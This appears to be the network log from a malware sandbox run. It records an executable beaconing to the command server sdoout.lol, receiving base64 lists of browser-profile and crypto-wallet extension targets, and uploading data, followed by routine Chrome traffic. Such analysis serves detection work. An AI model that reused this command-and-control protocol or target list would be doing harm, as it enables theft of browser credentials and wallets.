                                                                                                                                                                                                                                                                                          2024-12-30 14:55:08 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 78 74 32 64 62 73 30 72 31 6e 37 79 75 61 31 64 62 31 6e 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 42 44 43 45 43 32 46 33 30 35 32 34 35 38 35 30 34 38 39 33 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 78 74 32 64 62 73 30 72 31 6e 37 79 75 61 31 64 62 31 6e 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 78 74 32 64 62 73 30 72 31 6e 37 79 75 61 31 64 62 31 6e 79 2d 2d 0d
                                                                                                                                                                                                                                                                                          Data Ascii: ------xt2dbs0r1n7yua1db1nyContent-Disposition: form-data; name="hwid"ABBDCEC2F3052458504893-a33c7340-61ca------xt2dbs0r1n7yua1db1nyContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------xt2dbs0r1n7yua1db1ny--
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:09 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:09 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 3a1|1|1|1|9f491112abbf35d7d54dbf2b89eb1108|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          3192.168.2.949709116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:09 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----wbsjmyuaiwtrie3ozukf
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:09 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 77 62 73 6a 6d 79 75 61 69 77 74 72 69 65 33 6f 7a 75 6b 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 77 62 73 6a 6d 79 75 61 69 77 74 72 69 65 33 6f 7a 75 6b 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 77 62 73 6a 6d 79 75 61 69 77 74 72 69 65 33 6f 7a 75 6b 66 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------wbsjmyuaiwtrie3ozukfContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------wbsjmyuaiwtrie3ozukfContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------wbsjmyuaiwtrie3ozukfCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:10 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:10 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                          Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          4192.168.2.949710116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:11 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----pphvaasr1dbsrqq1ny58
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:11 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 70 70 68 76 61 61 73 72 31 64 62 73 72 71 71 31 6e 79 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 70 70 68 76 61 61 73 72 31 64 62 73 72 71 71 31 6e 79 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 70 70 68 76 61 61 73 72 31 64 62 73 72 71 71 31 6e 79 35 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------pphvaasr1dbsrqq1ny58Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------pphvaasr1dbsrqq1ny58Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------pphvaasr1dbsrqq1ny58Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:11 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:11 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                          Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          5192.168.2.949711116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:12 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----d2ny5p8q9rqimyusjeu3
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 332
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:12 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 64 32 6e 79 35 70 38 71 39 72 71 69 6d 79 75 73 6a 65 75 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 64 32 6e 79 35 70 38 71 39 72 71 69 6d 79 75 73 6a 65 75 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 64 32 6e 79 35 70 38 71 39 72 71 69 6d 79 75 73 6a 65 75 33 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------d2ny5p8q9rqimyusjeu3Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------d2ny5p8q9rqimyusjeu3Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------d2ny5p8q9rqimyusjeu3Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:13 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:13 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          6192.168.2.949712116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:14 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----y5fctr1d2dtrqqimgvas
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 5921
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:14 UTC5921OUTData Raw: 2d 2d 2d 2d 2d 2d 79 35 66 63 74 72 31 64 32 64 74 72 71 71 69 6d 67 76 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 79 35 66 63 74 72 31 64 32 64 74 72 71 71 69 6d 67 76 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 79 35 66 63 74 72 31 64 32 64 74 72 71 71 69 6d 67 76 61 73 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------y5fctr1d2dtrqqimgvasContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------y5fctr1d2dtrqqimgvasContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------y5fctr1d2dtrqqimgvasCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:14 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:14 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          7192.168.2.949713116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:15 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----y5fctr1d2dtrqqimgvas
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 489
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:15 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 79 35 66 63 74 72 31 64 32 64 74 72 71 71 69 6d 67 76 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 79 35 66 63 74 72 31 64 32 64 74 72 71 71 69 6d 67 76 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 79 35 66 63 74 72 31 64 32 64 74 72 71 71 69 6d 67 76 61 73 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------y5fctr1d2dtrqqimgvasContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------y5fctr1d2dtrqqimgvasContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------y5fctr1d2dtrqqimgvasCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:15 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:15 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          8192.168.2.949717142.250.185.684437916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC603OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCNy9zQEIucrNAQip0c0BCInTzQEIqdXNAQjJ1s0BCPTWzQEIqNjNAQj5wNQVGOmYzQEY642lFw==
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:17 GMT
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Bas1CBph2Vf7KiZnOC_d-w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC124INData Raw: 33 33 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 32 30 32 35 20 6e 66 6c 20 64 72 61 66 74 20 70 69 63 6b 73 22 2c 22 72 69 70 70 6c 65 20 78 72 70 20 70 72 69 63 65 22 2c 22 6d 61 73 73 20 75 6e 66 6f 6c 6c 6f 77 69 6e 67 20 76 65 78 62 6f 6c 74 73 22 2c 22 6e 76 69 64 69 61 20 67 65 66 6f 72 63 65 20 72 74 78 20 35 30 39 30 22 2c 22 77 69 6e 74 65 72 20 73 74 6f 72 6d
                                                                                                                                                                                                                                                                                          Data Ascii: 335)]}'["",["2025 nfl draft picks","ripple xrp price","mass unfollowing vexbolts","nvidia geforce rtx 5090","winter storm
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC704INData Raw: 20 77 61 72 6e 69 6e 67 22 2c 22 6b 65 73 73 6c 65 72 20 73 79 6e 64 72 6f 6d 65 20 73 70 61 63 65 22 2c 22 69 70 73 77 69 63 68 20 74 6f 77 6e 20 76 73 20 63 68 65 6c 73 65 61 20 66 63 20 70 72 65 64 69 63 74 69 6f 6e 22 2c 22 73 61 76 69 6e 67 20 74 6f 6f 20 6d 75 63 68 20 66 6f 72 20 72 65 74 69 72 65 6d 65 6e 74 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c
                                                                                                                                                                                                                                                                                          Data Ascii: warning","kessler syndrome space","ipswich town vs chelsea fc prediction","saving too much for retirement"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","googl
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          9192.168.2.949718142.250.185.684437916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC506OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCNy9zQEIucrNAQip0c0BCInTzQEIqdXNAQjJ1s0BCPTWzQEIqNjNAQj5wNQVGOmYzQEY642lFw==
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
